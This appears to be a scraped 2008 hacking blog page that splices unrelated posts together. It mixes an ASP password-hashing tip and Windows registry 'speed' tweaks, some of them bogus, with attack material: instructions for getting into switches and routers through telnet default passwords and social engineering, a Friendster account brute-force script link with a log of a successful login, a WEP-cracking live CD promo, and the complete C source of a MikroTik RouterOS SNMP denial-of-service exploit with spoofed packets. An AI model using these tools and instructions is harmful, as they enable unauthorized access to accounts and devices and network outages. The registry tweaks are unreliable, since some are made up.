If you're using a login script on your site you probably store usernames and passwords in a database for authenticating the login.

For security reasons, you should never store these as plain text but should encrypt them with a one-way hash function such as md5 or sha1.

As neither of these funtions are included with ASP, you'll need to download and unzip the hash function you want to use and upload it to your webspace.

To use the functions, include the file in the pages you want to use hashing.

or

Then you simply call the function with either:
<% MD5("string") or SHA1("string") %>

For example, if you wanted to encrypt a Username and Password on a signup form, you would collect the Username and Password from the submitted form, hash them and then insert the hashed values into your database

<% strHashedUsername = MD5(Request.Form("Username")) strHashedPassword = MD5(Request.Form("Password")) %>

To authenticate a user who is attempting to sign in, Hash the username and Password from the form and compare these with the strHashedUsername and strHashedPassword stored in your database.

If a user forgets their password you'll need to generate a new, pseudo-random password for the user as hashing is one-way can't be unencrypted.


Download md5.zip
Download sha1.zip

[markvoss]

Minggu, 20 April 2008

Video : Advanced Mysql Injection in Joomla

this will be straight post , i’ll share you the latest video hacking tutorial from milw0rm.com. it’s Advanced Mysql Injection in Joomla by bi_gys, it tested localy to prove the bug. it provide the the bug and complete step how to use this bug. and why i share here, cause some people doesn’t know how to download the vidoe from milw0m.so to help you you can download the damn video here. LoL


Enjoyed

Hacking Router and Switch

the hacking technique that i will tell to you is very old technique , what we will do is very depend of your luck. :D but we also have some literatur to make you success percentage become higher. what you only need to know is the type and the brand of the Switch and Router. if you don’t know it you still have a chance to get “in” but it not easy of course.the first technique i tell(you know the type and brand the target) you is depend of your luck because it will brute force.but the second is depend of your skill fo “social enginering”. this technique is not common hacking technique it not need any tools. its just use your head. your intellegence will tested here because you need to guess the passowrd and the username with only chat and asking random question to the network administrator. you now , yesterday i read some one post that tell that we can hack yahoo! or hotmail email just use this technique. of course we can , but it very difficult to guess the password since we may only have to pick one password from everthing you can think!!.First how can we hack a switch just use one tools . and this tools is very common tools.we will use port scanner. and this is the step :

* Scan your Local Network using some tools you can use Angry IP Scanner like i do. and you only need Scanning for OPEN port 23.this port is usually use for switch
* after getting the IP you can try the telnet connection to that IP. telnet [IP target] 23

and now your intellegence will tested. of course we don’t know the username and password for that switch. but i bet the username “administrator” or “admin” that standart username for network engine like that will work. you can use one of that username and now all depend of your luck. to higher our chance to get pass you can read the default password list for all type.but i dont have the list of default password for switch so you need to use “social enginering” technique. good luck :D just incase try to keep the password (empthy) maybe it will work.because it works for me.. :D

and now for Router. luckly i have the list of default pasword for Router. and it hundreds !! and over. you can chose one of this. or you can read here router-default-password. that al l happy hacking..

Friendster Password BruteForce Script

To download this Friendster.com Password BruteForce Script , you can get it directly from http://www.darkc0de.com/bruteforce/friendsterbf.py .


Another Friendster hacking post .. (I’m actually tired of this topic , but since most of the visitors of this blog have asked me a lot about Friendster hacking topics through email , I decided to keep posting on this topic :) )

Today I just want to share a python script that I found in the wild , It’s called Friendster.com BruteForce . And as You expected , it’s a script to automate the bruteforce attack against Friendster.com ’s login form . That’s How you would break into someone’s Friendster.com account.

The preview of the working script :

[+] Testing Proxy…
[+] Proxy: 148.233.159.58:3128
[+] Verbose Mode On

[+] BruteForcing: http://www.friendster.com/login.php
[+] Email: @yahoo.com
[+] Words Loaded: 2290

[-] Login Failed: 12345
[-] Login Failed: abc123
[-] Login Failed: password
[-] Login Failed: passwd
[-] Login Failed: 123456
[-] Login Failed: newpass
[-] Login Failed: notused
[-] Login Failed: Hockey
[-] Login Failed: internet
[-] Login Failed: asshole
[-] Login Failed: Maddock
[-] Login Failed: 12345678
[-] Login Failed: newuser
[-] Login Failed: computer
[-] Login Failed: Internet
[-] Login Failed: Mickey
[-] Login Failed: qwerty
[-] Login Failed: fiction
[-] Login Failed: Cowboys
[-] Login Failed: Jordan
[-] Login Failed: Hatton
[-] Login Failed: test
[-] Login Failed: Michael
[-] Login Failed: ou812
[-] Login Failed: orange
[-] Login Failed: 1234
[-] Login Failed: Beavis
[-] Login Failed: 123
[-] Login Failed: tigger
HTTP Error 500: Server Error

[!] Login Successfull: @yahoo.com Soccer





CMD Windows like shell Linux

Sometimes

I use windows. I know and like linux but not as a desktop operating system.
I often find myself typing “ls” or “cat” inside the windows shell, which obviously returns an error.

I started to P.I.M.P. my windows shell (cmd.exe)

  1. I downloaded unxutils from sourceforge unpacked the archive,
    went to usr\local\wbin copied every file that is there and pasted them in c:\windows\system32\ without replacing the windows utilities (there are 3 files that i don’t recommend overwriting)
    Now i have ls, cat, tee, grep …
  2. Downloaded netcat for windows copied all the files in c:\windows\system32\
    Now i have nc - a very good telnet client, and can also be used as a server :)
  3. I got pstools from sysinternals put the executables in c:\windows\system32\
  4. Plus nmap for windows put it in the same windows path.
    A must use tool…
  5. I also like hping2, for those who don’t know it, it’s a packet crafter.

Now you can use your windows command line. Until now it was pretty much useless.

Now you can
nmap -A -O -vv websecurity.ro | tee websecurity_report.txt | grep open

Setting Speed Faster Windows

——————————————-
PC MORE FASTER MORE THAN BEFORE
================================
HKEY_CURRENT_USER\Control Panel\Desktop
then select
MenuShowDelay
change 400 to 0

——————————————
MAKE COPY EASY N FASTER
==========================
HKEY_CURRENT_USER\Control Panel\Desktop
then change PaintDesktopVersion from 0 to1

———————————————–
CHANGE THE ORGANIZATION OR THE OWNER NAMES
========================================
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
then on RegisteredOrganization and RegisteredOwner
you can type any thing you want

—————————————————-

MAKE APPLICATION OPEN MORE POWER
===========================================
HKEY_CLASSES_ROOT\exefile
then right click on shell and make new key and putit name is
high priority
and then click on high priority and make new key and put it name is
command
and in the other side modify the value to
c:\WINDOWS\System32\cmd.exe /c start “runhigh” /high “%1

——————————————————-

MAKE A COPY TO FOLDER AND MOVE TO FOLDER IN CONTEXT MENU OPTION
===================================
HKEY_CLASSES_ROOT\AllFilesystemObjects\shellex
AND ON THE “ContextMenuHandlers”
RIGHT CLICK AND MAKE A NEW KEY AND NAME IT “COPY TO FOLDER…”
THEN IN OTHER SIDE DOUBLE CLICK AND PUT THE FOLLWING
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
REPET ONE MORE AND MAKE NEW KEY BUT TIS TIME NAME IT TO ” MOVE TO FOLDER…”
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

AND RESTART THE PC

————————————————————
INCREASE YOUR CONNECTION
========================
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Internet Settings

then make 3 new values
MaxConnectionsPer1_0Server value (a)
MaxConnectionsPer1_0Server value (b)
MaxConnectionsPerServer value (a)-

——————————–
START MENU
===========
RUN
TYPE “SYSTEM.INI”
AND IN THE END
PUT THE FOLLWING

page buffer=100000kbps
load=100000kbps
Download=100000kbps
save=100000kbps
back=100000kbps

——————————————————–
PUT YOU NAME ON WINDOW TITLE
===============================

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
and type
WINDOW TITLE
================================================== =====

Sabtu, 19 April 2008

Wireless Hacking Live-CD - FBI version

By Yudhax



Five InterChangeAble Mirrors By Tâñvïr¥û$ûF For RapidSearching.CoM

Live Cd For Wireless Hacking, Also Used By The Fbi
This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
- Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI …

WEP Hacking - The Next Generation

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.
Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104. The IV is placed in encrypted frame’s header, and is transmitted in plain text.
Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets—a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, “It doesn’t matter if you use 128 bit WEP keys, you are vulnerable!”
WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.
WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.
Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.
A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104.
The IV is placed in encrypted frame’s header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process.
An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.
After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.
This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.
Basic Directions:

1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.

dDos Mikrotik OS

By Yudhax

File Publish of,  damned shit...
Good progress bro...

/* --------------------------------------------------------------------------
* (c) ShadOS 2008
* _ _ _ _ _ __ _ _ _
* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
* hellknights.void.ru |___/ .0x48k.
*
* --------------------------------------------------------------------------
*
* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
* Don't forget to visit our site and my homepage for new releases:
* http://hellknights.void.ru
* http://shados.freeweb7.com
* Also, you can mail me any bugs or suggestions:
* mailto: shados /at/ mail /dot/ ru
*
* Thanks 2 antichat.ru and all my friends.
* --------------------------------------------------------------------------
*
* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* --------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <memory.h>
#include <string.h>

char evilcode[] = {
0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
};


unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}

int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
char *packet;
struct sockaddr_in dstaddr;
struct iphdr *ip;
struct udphdr *udp;
packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+sizeof(struct iphdr));
ip->saddr = *saddr;
ip->daddr = *daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->id = htons((unsigned short) rand());
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(sizeof(struct udphdr) + len);
memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
dstaddr.sin_family = AF_INET;
dstaddr.sin_addr.s_addr = *daddr;
if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
perror("sendto() failed");
free(packet);
}

char * makereq(char *community,int *size)
{
char *buf;
char *ptr;
int len;
int i;

len = 5 + strlen(community) + sizeof(evilcode);
buf = (char *)malloc(len);
ptr = buf;

*ptr++ = 0x30;
*ptr++ = len;

/* Snmp Version */
*ptr++ = 0x02;
*ptr++ = 0x01;
*ptr++ = 0x00;

/* Community */
*ptr++ = 0x04;
*ptr++ = strlen(community);
strcpy(ptr,community);
ptr = ptr + strlen(community);


*ptr++ = 0xa3; /* Set Request */

memcpy(ptr, evilcode, sizeof(evilcode));
ptr = ptr + sizeof(evilcode);

*size = len+2;
return buf;
}

int erexit(char *msg)
{
printf("%s\n",msg);
exit (-1) ;
}

int usage()
{
printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
}

int main(int argc, char **argv)
{
char *saddr,*daddr,*community;
unsigned char *buf;
int size;
int sock;
unsigned long lsaddr,ldaddr;
int i;

saddr = NULL;
daddr = NULL;
if (argc != 7) { usage(); erexit("not enough args\n"); }

if (!strcmp(argv[1],"-s"))
saddr = strdup(argv[2]);
if (!strcmp(argv[3],"-d"))
daddr = strdup(argv[4]);
if (!strcmp(argv[5],"-c"))
community = strdup(argv[6]);

printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);

if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
erexit("Invalid source/destination IP address\n");

if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }

sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if (sock == -1)
erexit("Couldnt open Raw socket!(Are you root?)\n");

lsaddr = inet_addr(saddr);
ldaddr = inet_addr(daddr);

buf = makereq(community,&size);

sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
fprintf(stdout,"Sent packet. SNMPd must be down.\n");
return 0;

}